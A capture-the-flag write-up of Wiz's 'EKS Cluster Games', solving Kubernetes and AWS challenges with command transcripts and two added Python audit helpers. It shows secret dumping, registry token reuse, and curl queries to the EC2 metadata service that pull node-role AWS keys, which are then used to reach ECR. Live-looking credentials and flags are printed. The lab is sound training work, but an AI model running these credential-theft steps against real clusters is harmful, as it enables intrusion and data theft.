Wiz CTF “EKS CLUSTER GAMES” Write Up

Eviatar Gerzi
18 min read · Nov 19, 2023

Wiz released a nice CTF about Amazon Elastic Kubernetes Service (Amazon EKS), a managed service for running Kubernetes in the AWS cloud. It is a great, very user-friendly CTF, and even if you are just starting out in this area you can learn a lot from it.

In this post, we will go over the challenges, show the thought process, and solve them. I strongly suggest trying them yourself before looking at these solutions. Don’t give up! If you encounter terms you are not familiar with, search the web and read about them.

Let the games begin:

https://eksclustergames.com/

1 — Secret Seeker

According to the challenge, we need to list the secrets in the cluster, and we can see that we have the required permissions:

{
  "secrets": [
    "get",
    "list"
  ]
}

We start by listing the secrets and find one secret:

root@wiz-eks-challenge:~# kubectl get secrets
NAME         TYPE     DATA   AGE
log-rotate   Opaque   1      3d20h

Let’s see what’s inside it:

root@wiz-eks-challenge:~# kubectl get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
  kind: Secret
  ...

The flag is base64-encoded; let’s decode it and read the flag:

root@wiz-eks-challenge:~# kubectl get secrets -o json | jq -r '.items[].data.flag' | base64 -d
wiz_eks_challenge{omg_over_privileged_secret_access}

2 — Registry Hunt

Our permissions on this challenge:

{
  "secrets": [
    "get"
  ],
  "pods": [
    "list",
    "get"
  ]
}

Interestingly, we can’t list secrets, only get them. This means we can view a secret only if we already know its name.

In this challenge we need to look at the container registries. We have permission to list pods, so we start with that:

root@wiz-eks-challenge:~# kubectl get pods
NAME                    READY   STATUS    RESTARTS   AGE
database-pod-2c9b3a4e   1/1     Running   0          3d19h

The full details of the pod:

root@wiz-eks-challenge:~# kubectl get pods -o yaml
apiVersion: v1
items:
- apiVersion: v1
  kind: Pod
  metadata:
    annotations:
      kubernetes.io/psp: eks.privileged
      pulumi.com/autonamed: "true"
    creationTimestamp: "2023-11-01T13:32:05Z"
    name: database-pod-2c9b3a4e
    namespace: challenge2
    resourceVersion: "897497"
    uid: 57fe7d43-5eb3-4554-98da-47340d94b4a6
  spec:
    containers:
    - image: eksclustergames/base_ext_image
      imagePullPolicy: Always
      name: my-container
      resources: {}
      terminationMessagePath: /dev/termination-log
      terminationMessagePolicy: File
      volumeMounts:
      - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
        name: kube-api-access-cq4m2
        readOnly: true
    dnsPolicy: ClusterFirst
    enableServiceLinks: true
    imagePullSecrets:
    - name: registry-pull-secrets-780bab1d
    nodeName: ip-192-168-21-50.us-west-1.compute.internal
    preemptionPolicy: PreemptLowerPriority
    priority: 0
    restartPolicy: Always
    schedulerName: default-scheduler
    securityContext: {}
    serviceAccount: default
    serviceAccountName: default
    terminationGracePeriodSeconds: 30
    tolerations:
    - effect: NoExecute
      key: node.kubernetes.io/not-ready
      operator: Exists
      tolerationSeconds: 300
    - effect: NoExecute
      key: node.kubernetes.io/unreachable
      operator: Exists
      tolerationSeconds: 300
    volumes:
    - name: kube-api-access-cq4m2
      projected:
        defaultMode: 420
        sources:
        - serviceAccountToken:
            expirationSeconds: 3607
            path: token
        - configMap:
            items:
            - key: ca.crt
              path: ca.crt
            name: kube-root-ca.crt
        - downwardAPI:
            items:
            - fieldRef:
                apiVersion: v1
                fieldPath: metadata.namespace
              path: namespace
  status:
    conditions:
    - lastProbeTime: null
      lastTransitionTime: "2023-11-01T13:32:05Z"
      status: "True"
      type: Initialized
    - lastProbeTime: null
      lastTransitionTime: "2023-11-01T13:32:08Z"
      status: "True"
      type: Ready
    - lastProbeTime: null
      lastTransitionTime: "2023-11-01T13:32:08Z"
      status: "True"
      type: ContainersReady
    - lastProbeTime: null
      lastTransitionTime: "2023-11-01T13:32:05Z"
      status: "True"
      type: PodScheduled
    containerStatuses:
    - containerID: containerd://b427307b7f428bcf6a50bb40ebef194ba358f77dbdb3e7025f46be02b922f5af
      image: docker.io/eksclustergames/base_ext_image:latest
      imageID: docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623
      lastState: {}
      name: my-container
      ready: true
      restartCount: 0
      started: true
      state:
        running:
          startedAt: "2023-11-01T13:32:08Z"
    hostIP: 192.168.21.50
    phase: Running
    podIP: 192.168.12.173
    podIPs:
    - ip: 192.168.12.173
    qosClass: BestEffort
    startTime: "2023-11-01T13:32:05Z"
kind: List
metadata:
  resourceVersion: ""

We can see the image here:

root@wiz-eks-challenge:~# kubectl get pods -o yaml | grep image
    - image: eksclustergames/base_ext_image
      imagePullPolicy: Always
    imagePullSecrets:
      image: docker.io/eksclustergames/base_ext_image:latest
      imageID: docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623

The imagePullSecrets field is interesting because it contains the name of the secret (from the Kubernetes API reference):

ImagePullSecrets is an optional list of references to secrets in the same namespace to use for pulling any of the images used by this PodSpec. If specified, these secrets will be passed to individual puller implementations for them to use.

Under the imagePullSecrets we have the name of the secret:

    imagePullSecrets:
    - name: registry-pull-secrets-780bab1d
    nodeName: ip-192-168-21-50.us-west-1.compute.internal

We now have the name of the secret, so we can view it even without list permission:

root@wiz-eks-challenge:~# kubectl get secrets registry-pull-secrets-780bab1d -o yaml
apiVersion: v1
data:
  .dockerconfigjson: eyJhdXRocyI6IHsiaW5kZXguZG9ja2VyLmlvL3YxLyI6IHsiYXV0aCI6ICJaV3R6WTJ4MWMzUmxjbWRoYldWek9tUmphM0pmY0dGMFgxbDBibU5XTFZJNE5XMUhOMjAwYkhJME5XbFpVV280Um5WRGJ3PT0ifX19
kind: Secret
metadata:
  annotations:
    pulumi.com/autonamed: "true"
  creationTimestamp: "2023-11-01T13:31:29Z"
  name: registry-pull-secrets-780bab1d
  namespace: challenge2
  resourceVersion: "897340"
  uid: 1348531e-57ff-42df-b074-d9ecd566e18b
type: kubernetes.io/dockerconfigjson

Let’s look at what is inside the .dockerconfigjson:

root@wiz-eks-challenge:~# kubectl get secrets registry-pull-secrets-780bab1d -o json | jq -r '.data.".dockerconfigjson"' | base64 -d | jq
{
  "auths": {
    "index.docker.io/v1/": {
      "auth": "ZWtzY2x1c3RlcmdhbWVzOmRja3JfcGF0X1l0bmNWLVI4NW1HN200bHI0NWlZUWo4RnVDbw=="
    }
  }
}

We decode the auth value and get the registry username and password:

root@wiz-eks-challenge:~# kubectl get secrets registry-pull-secrets-780bab1d -o json | jq -r '.data.".dockerconfigjson"' | base64 -d | jq -r '.auths | to_entries[]| .value.auth' | base64 -d
eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
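As an added example (not part of the original write-up), here is a small Python audit that does what the pod and secret inspection above does by hand: it maps each pod to the imagePullSecrets it references and decodes a kubernetes.io/dockerconfigjson secret into per-registry credentials, handling both the packed auth field and the separate username/password form. The pod list and secret below are constructed samples, not the CTF’s real values.

```python
import base64
import json

# Constructed sample objects (not the CTF's real values): a pod list in the shape
# `kubectl get pods -o json` returns, and the pull secret one of the pods references.
POD_LIST = {
    "items": [
        {
            "metadata": {"name": "database-pod", "namespace": "demo"},
            "spec": {
                "containers": [{"name": "db", "image": "example/base_ext_image"}],
                "imagePullSecrets": [{"name": "registry-pull-secrets-demo"}],
            },
        },
        {
            "metadata": {"name": "other-pod", "namespace": "demo"},
            "spec": {"containers": [{"name": "app", "image": "example/app"}]},
        },
    ]
}

# The secret body is a base64 JSON document; each registry entry carries either a
# packed "auth" (base64 of user:password) or explicit username/password keys.
DOCKERCONFIG = {
    "auths": {
        "index.docker.io/v1/": {
            "auth": base64.b64encode(b"demo-user:dckr_pat_EXAMPLE_TOKEN").decode()
        },
        "registry.example.internal": {"username": "svc", "password": "s3cret-example"},
    }
}
SECRET = {
    "metadata": {"name": "registry-pull-secrets-demo", "namespace": "demo"},
    "type": "kubernetes.io/dockerconfigjson",
    "data": {".dockerconfigjson": base64.b64encode(json.dumps(DOCKERCONFIG).encode()).decode()},
}


def image_pull_secret_refs(pod_list: dict) -> dict:
    """Map pod name -> list of imagePullSecrets names found in its spec."""
    refs = {}
    for pod in pod_list.get("items", []):
        names = [s["name"] for s in pod.get("spec", {}).get("imagePullSecrets", [])]
        if names:
            refs[pod["metadata"]["name"]] = names
    return refs


def decode_dockerconfigjson(secret: dict) -> dict:
    """Return {registry: (username, password)} from a kubernetes.io/dockerconfigjson secret."""
    if secret.get("type") != "kubernetes.io/dockerconfigjson":
        raise ValueError("not a kubernetes.io/dockerconfigjson secret")
    config = json.loads(base64.b64decode(secret["data"][".dockerconfigjson"]))
    creds = {}
    for registry, entry in config.get("auths", {}).items():
        if "auth" in entry:
            # "auth" is base64(user:password); split on the first colon only,
            # because tokens may themselves contain colons.
            user, _, password = base64.b64decode(entry["auth"]).decode().partition(":")
        else:
            user, password = entry.get("username", ""), entry.get("password", "")
        creds[registry] = (user, password)
    return creds


def exposure_report(pod_list: dict, secrets: list) -> dict:
    """Per pod: which registry identities anyone with `get` on its pull secrets obtains.

    Passwords are deliberately not included in the report lines."""
    by_name = {s["metadata"]["name"]: s for s in secrets}
    report = {}
    for pod, names in image_pull_secret_refs(pod_list).items():
        lines = []
        for name in names:
            for registry, (user, _pw) in decode_dockerconfigjson(by_name[name]).items():
                lines.append(f"{name}: {registry} as {user} (password masked)")
        report[pod] = lines
    return report
```

A real audit would pair this with `kubectl auth can-i get secrets` for each service account, since in this challenge `get` alone on a known secret name was enough to expose the registry token.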

We used crane to log in to the Docker registry with the above credentials:

# username: eksclustergames
# password: dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
root@wiz-eks-challenge:~# crane auth login -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo docker.io
2023/11/05 09:54:47 logged in via /home/user/.docker/config.json

We list the config of the image:

root@wiz-eks-challenge:~# crane config eksclustergames/base_ext_image:latest | jq
{
  "architecture": "amd64",
  "config": {
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sleep",
      "3133337"
    ],
    "ArgsEscaped": true,
    "OnBuild": null
  },
  "created": "2023-11-01T13:32:18.920734382Z",
  "history": [
    {
      "created": "2023-07-18T23:19:33.538571854Z",
      "created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
    },
    {
      "created": "2023-07-18T23:19:33.655005962Z",
      "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
      "empty_layer": true
    },
    {
      "created": "2023-11-01T13:32:18.920734382Z",
      "created_by": "RUN sh -c echo 'wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}' > /flag.txt # buildkit",
      "comment": "buildkit.dockerfile.v0"
    },
    {
      "created": "2023-11-01T13:32:18.920734382Z",
      "created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
      "comment": "buildkit.dockerfile.v0",
      "empty_layer": true
    }
  ],
  "os": "linux",
  "rootfs": {
    "type": "layers",
    "diff_ids": [
      "sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
      "sha256:a70cef1cb742e242b33cc21f949af6dc7e59b6ea3ce595c61c179c3be0e5d432"
    ]
  }
}

We can see the flag in the image history, in the RUN instruction that wrote /flag.txt:

wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}

3 — Image Inquisition

We start with the following permissions:

{
  "pods": [
    "list",
    "get"
  ]
}

We have permission to list pods, and the challenge is about the pod’s image and the ECR repository, so we looked at the pod spec to find the image:

root@wiz-eks-challenge:~# kubectl get pods -o yaml
apiVersion: v1
items:
- apiVersion: v1
  kind: Pod
  metadata:
    annotations:
      kubernetes.io/psp: eks.privileged
      pulumi.com/autonamed: "true"
    creationTimestamp: "2023-11-01T13:32:10Z"
    name: accounting-pod-876647f8
    namespace: challenge3
    resourceVersion: "897513"
    uid: dd2256ae-26ca-4b94-a4bf-4ac1768a54e2
  spec:
    containers:
    - image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
      imagePullPolicy: IfNotPresent
      name: accounting-container
      resources: {}
      terminationMessagePath: /dev/termination-log
      terminationMessagePolicy: File
      volumeMounts:
      - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
        name: kube-api-access-mmvjj
        readOnly: true
    dnsPolicy: ClusterFirst
    enableServiceLinks: true
    nodeName: ip-192-168-21-50.us-west-1.compute.internal
    preemptionPolicy: PreemptLowerPriority
    priority: 0
    restartPolicy: Always
    schedulerName: default-scheduler
    securityContext: {}
    serviceAccount: default
    serviceAccountName: default
    terminationGracePeriodSeconds: 30
    tolerations:
    - effect: NoExecute
      key: node.kubernetes.io/not-ready
      operator: Exists
      tolerationSeconds: 300
    - effect: NoExecute
      key: node.kubernetes.io/unreachable
      operator: Exists
      tolerationSeconds: 300
    volumes:
    - name: kube-api-access-mmvjj
      projected:
        defaultMode: 420
        sources:
        - serviceAccountToken:
            expirationSeconds: 3607
            path: token
        - configMap:
            items:
            - key: ca.crt
              path: ca.crt
            name: kube-root-ca.crt
        - downwardAPI:
            items:
            - fieldRef:
                apiVersion: v1
                fieldPath: metadata.namespace
              path: namespace
  status:
    conditions:
    - lastProbeTime: null
      lastTransitionTime: "2023-11-01T13:32:10Z"
      status: "True"
      type: Initialized
    - lastProbeTime: null
      lastTransitionTime: "2023-11-01T13:32:11Z"
      status: "True"
      type: Ready
    - lastProbeTime: null
      lastTransitionTime: "2023-11-01T13:32:11Z"
      status: "True"
      type: ContainersReady
    - lastProbeTime: null
      lastTransitionTime: "2023-11-01T13:32:10Z"
      status: "True"
      type: PodScheduled
    containerStatuses:
    - containerID: containerd://c465d5104e6f4cac49da0b7495eb2f7c251770f8bf3ce4a1096cf5c704b9ebbe
      image: sha256:575a75bed1bdcf83fba40e82c30a7eec7bc758645830332a38cef238cd4cf0f3
      imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
      lastState: {}
      name: accounting-container
      ready: true
      restartCount: 0
      started: true
      state:
        running:
          startedAt: "2023-11-01T13:32:11Z"
    hostIP: 192.168.21.50
    phase: Running
    podIP: 192.168.5.251
    podIPs:
    - ip: 192.168.5.251
    qosClass: BestEffort
    startTime: "2023-11-01T13:32:10Z"
kind: List
metadata:
  resourceVersion: ""

We have the container image:

688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c

But that’s all we get from the pod, and in order to dig into the ECR repository we need to log in to it with crane.

We start by looking for credentials that could let us reach the ECR repository. In a cloud environment, one place to look for interesting data is the EC2 Instance Metadata Service (IMDS). Querying some of its endpoints, we found the credentials of the node’s instance role:

root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info
{}
root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials
ec2-instance
root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
{}

root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/iam/security-credentials
eks-challenge-cluster-nodegroup-NodeInstanceRole
root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole | jq
{
  "AccessKeyId": "ASIA2AVYNEVMSAUIBIHQ",
  "Expiration": "2023-11-05 16:12:10+00:00",
  "SecretAccessKey": "OZG50na54oGIaiGn2Vc07puNp9WBvlRScemRdMKN",
  "SessionToken": "FwoGZXIvYXdzEFEaDGwq4kiyacXn2zrlhiK3ATbgJsxPS1OOMdcXAA/2goG1num3v/+MLgFGLNvbpQk0krshYkhfhuOxbf+vhbcBFeYdQbgzj/1PUvObdFSIw9dOuIisbyS+KT6acZfF/e0hsGLcsShiKVI+pXQHYMC8H8xKf4uqoStjx+55QbCT1Uo9vsJSifv0vbSjR2I50bcrEykZyMGcdrrjNlK7m4CTYcTlWDkbR0VbsFZ8Dbo6MJxqDjTSY7CAA3v9AALR0PbWc3FzVrNDDSjK4Z6qBjItxAmlTpRiOY3F3wQdGfxC+YnWIkJg9pe6BcP5B1iHSx/CMQNG67j+NdT0miAG"
}

We used these credentials to create the AWS config and credentials files:

root@wiz-eks-challenge:~# aws configure
AWS Access Key ID [None]: ASIA2AVYNEVMSAUIBIHQ
AWS Secret Access Key [None]: OZG50na54oGIaiGn2Vc07puNp9WBvlRScemRdMKN
Default region name [None]: us-west-1
Default output format [None]:

# we know the region from the repository URL
root@wiz-eks-challenge:~# cat ~/.aws/config
[default]
region = us-west-1

# we needed to add the aws_session_token manually
root@wiz-eks-challenge:~# cat ~/.aws/credentials
[default]
aws_access_key_id = ASIA2AVYNEVMSAUIBIHQ
aws_secret_access_key = OZG50na54oGIaiGn2Vc07puNp9WBvlRScemRdMKN
aws_session_token = FwoGZXIvYXdzEFEaDGwq4kiyacXn2zrlhiK3ATbgJsxPS1OOMdcXAA/2goG1num3v/+MLgFGLNvbpQk0krshYkhfhuOxbf+vhbcBFeYdQbgzj/1PUvObdFSIw9dOuIisbyS+KT6acZfF/e0hsGLcsShiKVI+pXQHYMC8H8xKf4uqoStjx+55QbCT1Uo9vsJSifv0vbSjR2I50bcrEykZyMGcdrrjNlK7m4CTYcTlWDkbR0VbsFZ8Dbo6MJxqDjTSY7CAA3v9AALR0PbWc3FzVrNDDSjK4Z6qBjItxAmlTpRiOY3F3wQdGfxC+YnWIkJg9pe6BcP5B1iHSx/CMQNG67j+NdT0miAG

We can now get the AWS identity:

root@wiz-eks-challenge:~# aws sts get-caller-identity
{
  "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
  "Account": "688655246681",
  "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}

Following the AWS CLI ECR documentation, we started to look over the ECR with aws ecr describe-repositories:

{
  "repositories": [
    {
      "repositoryArn": "arn:aws:ecr:us-west-1:688655246681:repository/testos",
      "registryId": "688655246681",
      "repositoryName": "testos",
      "repositoryUri": "688655246681.dkr.ecr.us-west-1.amazonaws.com/testos",
      "createdAt": "2023-10-29T17:52:00+00:00",
      "imageTagMutability": "MUTABLE",
      "imageScanningConfiguration": {
        "scanOnPush": false
      },
      "encryptionConfiguration": {
        "encryptionType": "AES256"
      }
    },
    {
      "repositoryArn": "arn:aws:ecr:us-west-1:688655246681:repository/central_repo-aaf4a7c",
      "registryId": "688655246681",
      "repositoryName": "central_repo-aaf4a7c",
      "repositoryUri": "688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c",
      "createdAt": "2023-11-01T13:31:27+00:00",
      "imageTagMutability": "MUTABLE",
      "imageScanningConfiguration": {
        "scanOnPush": false
      },
      "encryptionConfiguration": {
        "encryptionType": "AES256"
      }
    }
  ]
}

root@wiz-eks-challenge:~# aws ecr describe-registry

An error occurred (AccessDeniedException) when calling the DescribeRegistry operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 is not authorized to perform: ecr:DescribeRegistry on resource: * because no identity-based policy allows the ecr:DescribeRegistry action

That didn’t help us, but we found some interesting commands through the help menu:

root@wiz-eks-challenge:~# aws ecr help
root@wiz-eks-challenge:~# aws ecr get-authorization-token
{
  "authorizationData": [
    {
      "authorizationToken": "<omitted>",
      "expiresAt": "2023-11-06T03:27:42.838000+00:00",
      "proxyEndpoint": "https://688655246681.dkr.ecr.us-west-1.amazonaws.com"
    }
  ]
}

root@wiz-eks-challenge:~# aws ecr get-authorization-token | jq -r '.authorizationData[].authorizationToken' | base64 -d
AWS:<omitted>

root@wiz-eks-challenge:~# aws ecr get-authorization-token | jq -r '.authorizationData[].authorizationToken' | base64 -d | cut -d ':' -f 2 | base64 -d | jq
{
  "payload": "<omitted>",
  "datakey": "AQEBAHijEFXGwF1cipVOacG8qRmJoVBPay8LUUvU8RCVV0XoHwAAAH4wfAYJKoZIhvcNAQcGoG8wbQIBADBoBgkqhkiG9w0BBwEwHgYJYIZIAWUDBAEuMBEEDDzmqZO2lEQcMseecQIBEIA7jFKdv6H78nt1/OCRCarxkPZCbdewWZ7bPo/2+6P3meWkJeIo2L4yRpMdI6/bw+CYeViUxNw7qa+uR28=",
  "version": "2",
  "type": "DATA_KEY",
  "expiration": 1699241680
}

root@wiz-eks-challenge:~# aws ecr get-login-password
<omitted>

root@wiz-eks-challenge:~# aws ecr get-login-password | base64 -d | jq
{
  "payload": "<omitted>",
  "datakey": "AQEBAHijEFXGwF1cipVOacG8qRmJoVBPay8LUUvU8RCVV0XoHwAAAH4wfAYJKoZIhvcNAQcGoG8wbQIBADBoBgkqhkiG9w0BBwEwHgYJYIZIAWUDBAEuMBEEDIMmhQK5Dqsumg+yEwIBEIA7NW69GWBrvPGyF+SQI2Nao8aYq3Ad6ltS9R2G7c3X76u+5SRJ0SXgXVbr+arsC2VI47gvIwQIdjang0g=",
  "version": "2",
  "type": "DATA_KEY",
  "expiration": 1699241423
}

We can get an authorization token and also a login password, but it is not obvious which one to use. Decoding both shows they carry the same kind of envelope: the authorization token is just base64 of AWS:&lt;login password&gt;.

After reading the Amazon documentation, we used the login password to log in with crane:

root@wiz-eks-challenge:~# aws ecr get-login-password --region us-west-1 | crane auth login --username AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com
2023/11/05 15:41:46 logged in via /home/user/.docker/config.json
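The relationship between the two commands above, as an added Python example that is not part of the original write-up: it splits an ECR authorizationToken into the AWS username and the password that get-login-password prints, reads the expiry out of the password’s JSON envelope, and checks whether it is still usable. The token below is a constructed sample with placeholder payload and datakey, not the CTF’s real token.

```python
import base64
import json
from datetime import datetime, timezone

# Constructed sample (not the CTF's real token): an envelope in the shape the
# challenge shows, wrapped exactly as `aws ecr get-authorization-token` wraps it.
SAMPLE_ENVELOPE = {
    "payload": "EXAMPLE-PAYLOAD",
    "datakey": "EXAMPLE-DATAKEY",
    "version": "2",
    "type": "DATA_KEY",
    "expiration": 1699241680,
}
SAMPLE_PASSWORD = base64.b64encode(json.dumps(SAMPLE_ENVELOPE).encode()).decode()
SAMPLE_AUTHORIZATION_TOKEN = base64.b64encode(f"AWS:{SAMPLE_PASSWORD}".encode()).decode()


def decode_ecr_authorization_token(authorization_token: str) -> tuple:
    """Split an ECR authorizationToken into (username, password).

    The token is base64("AWS:" + password); the password part is exactly what
    `aws ecr get-login-password` prints, so the two commands yield the same login.
    """
    decoded = base64.b64decode(authorization_token).decode()
    user, sep, password = decoded.partition(":")
    if sep != ":" or user != "AWS":
        raise ValueError("unexpected ECR authorization token layout")
    return user, password


def ecr_password_expiry(password: str) -> datetime:
    """Return the UTC expiry embedded in the password's JSON envelope.

    The password is base64 JSON with payload/datakey/version/type/expiration;
    only the expiration is meaningful to a client (payload and datakey are opaque).
    """
    envelope = json.loads(base64.b64decode(password))
    if envelope.get("type") != "DATA_KEY":
        raise ValueError("unexpected ECR password envelope")
    return datetime.fromtimestamp(int(envelope["expiration"]), tz=timezone.utc)


def ecr_password_is_valid(password: str, now_epoch: int) -> bool:
    """True while the password can still be used to log in to the registry."""
    return now_epoch < int(ecr_password_expiry(password).timestamp())


def same_credential(authorization_token: str, login_password: str) -> bool:
    """Confirm that get-authorization-token and get-login-password yield one credential."""
    return decode_ecr_authorization_token(authorization_token)[1] == login_password
```

Because the password is valid for hours regardless of where it was minted, a copy taken from a node (as in this challenge) keeps working after the node role session that produced it has rotated; expiry in audit logs is the value to watch.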

After the login we checked the image config with crane:

root@wiz-eks-challenge:~# crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 | jq
{
  "architecture": "amd64",
  "config": {
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sleep",
      "3133337"
    ],
    "ArgsEscaped": true,
    "OnBuild": null
  },
  "created": "2023-11-01T13:32:07.782534085Z",
  "history": [
    {
      "created": "2023-07-18T23:19:33.538571854Z",
      "created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
    },
    {
      "created": "2023-07-18T23:19:33.655005962Z",
      "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
      "empty_layer": true
    },
    {
      "created": "2023-11-01T13:32:07.782534085Z",
      "created_by": "RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit",
      "comment": "buildkit.dockerfile.v0"
    },
    {
      "created": "2023-11-01T13:32:07.782534085Z",
      "created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
      "comment": "buildkit.dockerfile.v0",
      "empty_layer": true
    }
  ],
  "os": "linux",
  "rootfs": {
    "type": "layers",
    "diff_ids": [
      "sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
      "sha256:9057b2e37673dc3d5c78e0c3c5c39d5d0a4cf5b47663a4f50f5c6d56d8fd6ad5"
    ]
  }
}

We can see the flag in the history:

wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future}

4 — Pod Break

We start without any interesting permissions:

root@wiz-eks-challenge:~# kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]

From the home directory we can see that we have credentials for AWS (.aws) and Docker Hub (.docker):

root@wiz-eks-challenge:~# ls -lla ~/
total 40
drwxr-xr-x 5 root root 130 Nov 6 07:29 .
drwxr-xr-x 3 root root 18 Oct 31 16:26 ..
drwxr-xr-x 2 root root 39 Nov 5 15:17 .aws
-rw------- 1 root root 21221 Nov 6 07:18 .bash_history
-rw-r--r-- 1 root root 3771 Nov 5 09:11 .bashrc
drwx------ 2 root root 25 Nov 5 15:46 .docker
drwxr-xr-x 3 root root 51 Nov 6 07:23 .kube
-rw------- 1 root root 20 Nov 6 07:29 .lesshst
-rw------- 1 root root 1759 Nov 6 06:41 .viminfo

We start by running aws sts get-caller-identity to get the AWS identity:

root@wiz-eks-challenge:~# aws sts get-caller-identity
{
  "UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
  "Account": "688655246681",
  "Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}

From the ARN we can get the cluster name: eks-challenge-cluster. We tried some of the enumeration techniques described here, but all of them returned access denied:

root@wiz-eks-challenge:~# aws eks describe-cluster --name eks-challenge-cluster

An error occurred (AccessDeniedException) when calling the DescribeCluster operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 is not authorized to perform: eks:DescribeCluster on resource: arn:aws:eks:us-west-1:688655246681:cluster/eks-challenge-cluster

We also tried to create an EKS kubeconfig, without success (reference):

root@wiz-eks-challenge:~# aws eks update-kubeconfig --name eks-challenge-cluster --region us-west-1

An error occurred (AccessDeniedException) when calling the DescribeCluster operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282 is not authorized to perform: eks:DescribeCluster on resource: arn:aws:eks:us-west-1:688655246681:cluster/eks-challenge-cluster

Eventually, we were able to get a cluster token (reference). Note that aws eks get-token does not contact EKS at all: it only creates a presigned STS GetCallerIdentity request with the cluster name in a signed header, so the command succeeds even with the typo in the cluster name below, although such a token is only accepted by a cluster whose name matches the signed header:

root@wiz-eks-challenge:~# aws eks get-token --cluster-name eks-challenge-cluser
{
  "kind": "ExecCredential",
  "apiVersion": "client.authentication.k8s.io/v1beta1",
  "spec": {},
  "status": {
    "expirationTimestamp": "2023-11-06T07:56:20Z",
    "token": "k8s-aws-v1.<omitted>"
  }
}

We can decode the token (the part after the k8s-aws-v1. prefix is a base64url-encoded presigned STS URL):

root@wiz-eks-challenge:~# aws eks get-token --cluster-name eks-challenge-cluser | jq -r '.status.token' | cut -d "." -f 2 | base64 -d
